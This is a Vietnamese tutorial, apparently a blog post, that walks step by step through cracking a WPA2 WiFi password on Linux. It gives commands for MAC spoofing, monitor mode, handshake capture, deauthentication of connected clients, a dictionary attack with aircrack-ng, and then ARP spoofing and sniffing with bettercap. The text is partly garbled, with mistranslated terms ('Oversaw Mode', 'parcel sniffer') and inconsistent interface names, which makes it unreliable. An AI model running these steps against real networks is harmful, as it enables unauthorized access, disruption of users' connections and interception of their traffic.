WIFI được sử dụng ở mọi nơi từ tại nhà, quán cafe và thậm chí là nơi công cộng. Vậy nên nơi đâu cũng là chỗ lý tưởng để các tin tặc có thể hack Wifi. Vậy nên trong bài viết này, mình sẽ mô phỏng lại quá trình tin tặc hack mật khẩu Wifi bằng Linux để các bạn hiểu được nhé.
Các công cụ cần thiết để hack mật khẩu Wifi
- Hệ điều hành Linux dựa trên Debian.
- Laptop và usb WIFI có hỗ trợ “Monitor Mode”. Bạn có thể mua con usb Wifi này.
- Tool aircrack-ng, cài đặt bằng lệnh “apt install aircrack-ng”
- Tool thay đổi địa chỉ MAC. Bạn có thể tải công cụ có sẵn tại đây hoặc đọc bài hướng dẫn tạ tool thay đổi địa chỉ MAC bằng python tại đây.
Thay đổi địa chỉ Mac
Mỗi thành phần của hệ thống đều có một vị trí tĩnh vật lý được phân bổ bởi nhà sản xuất. Vị trí tĩnh này được gọi là địa chỉ MAC (Media get to control). Địa chỉ Mac được sử dụng để nhận ra các tiện ích liên quan đến hệ thống khác vì lý do truyền dữ liệu. Sẽ tốt hơn nếu thay đổi địa chỉ Mac trước khi tấn công wifi. Chúng ta có thể thay đổi nó bằng cách sử dụng macchanger.
Chúng ta cần lấy tên interface:
ip addr show
Và thay đổi địa chỉ MAC
$ip link set wlp7s7 down $macchanger -m DD:DD:DD:DD:DD:DD wlp7s9 $ip link set wlp7s7 up
Đánh hơi gói wifi
Tất cả các gói sẽ được gửi cho chúng ta, ở chế độ bình thường có tên là “Managed Mode”. Nhưng với tư cách là một lập trình viên, chúng ta phải bắt được các gói wifi. “Oversaw Mode” không thể bắt được gói. Để bắt được gói, chúng ta phải thay đổi chế độ thành “Screen”. Chúng ta sẽ thấy chế độ hiện tại bằng lệnh:
$iwconfig lo no wireless extensions. wlp7s9 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
Bạn có thể thấy chúng ta đang ở chế độ “Managed. Vì vậy, hãy thay đổi nó thành chế độ “Monitor”:
$airmon-ng start wlp7s9
Chạy lại lệnh iwconfig, nó sẽ hiển thị “Mode: Monitor” và interface hiện tại là “wlp7s9mon”.
Bắt gói tin
Airodump-ng là một sản phẩm thuộc nhóm Aircrack-ng. Việc bắt từng gói tin có thể được thực hiện bằng cách sử dụng parcel sniffer. Chúng ta phải lọc tất cả các mạng wifi.
Như bây giờ, chúng ta sẽ bắt được gói. Trước tiên, chúng ta cần nhận biết số lượng AP (Điểm truy cập) xung quanh chúng ta:
$airodump-ng wlp7s7mon BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID BB:12:FF:38:BB:88 -46 6 0 0 5 260 WPA2 CCMP PSK Hacked $airodump-ng --bssid BB:12:FF:38:BB:88 --channel 5--write Hacked.cap wlp7s9mon
Ngắt kết nối client
Vấn đề là chúng ta phải đợi cho đến khi một khách hàng mới truy cập vào AP. Chúng ta không biết khi nào ai đó sẽ kết nối. Để làm cho công việc dễ dàng hơn, chúng ta có thể hủy xác thực mọi khách hàng/người dùng. Cuộc tấn công này sẽ ngắt kết nối tất cả mọi người khỏi wifi đang truy cập.
$aireplay-ng --deauth 100 -a BB:12:FF:38:BB:88 -c DD:DD:DD:DD:DD:DD wlp7s9mon
Lệnh này sẽ ngắt kết nối người đó khỏi quyền truy cập wifi trong một thời gian và người đó sẽ sớm kết nối lại.
Sử dụng Dictionary Attack
Đã đến lúc bẻ khóa mật khẩu. Chúng ta chỉ cần một tệp “Hacked.cap-01”
Để bẻ khóa mật khẩu, bạn cần có một tệp danh sách mật khẩu để thực hiện phương pháp tấn công từ điển (dictionary attack).
$aircrack-ng Hacked.cap-01 -w Hack_Password.txt Aircrack-ng 1.5.2
Chúng ta vừa tìm thấy mật khẩu. Bây giờ chúng ta sẽ có thể kết nối với wifi.
Mật khẩu wifi đã bị tấn công, rồi sao nữa?
Sau khi kết nối được với AP, chúng tôi có thể tìm thấy tất cả địa chỉ được liên kết với mạng này.
Trong trường hợp chúng ta chạy lệnh “arp – a”, tại thời điểm đó chúng ta sẽ có thể xem tất cả các địa chỉ IP và MAC được liên kết.
Chúng ta có thể sử dụng bettercap để đánh giá lưu lượng truy cập.
./bettercap bettercap v2.26.1 (được xây dựng cho Linux amd64 với go1.11.6) [nhập ‘help’ để biết danh sách các lệnh]
192.168.8.0/24 > 192.168.8.4 » net.sniff on 192.168.8.0/24 > 192.168.8.4 » arp.spoof on 192.168.8.0/24 > 192.168.8.4 » [02:39:24] [net.sniff.dns] dns
Chúng ta có thể thực hiện một số cuộc tấn công nâng cao hơn sau khi kết nối với điểm truy cập như tấn công MITM.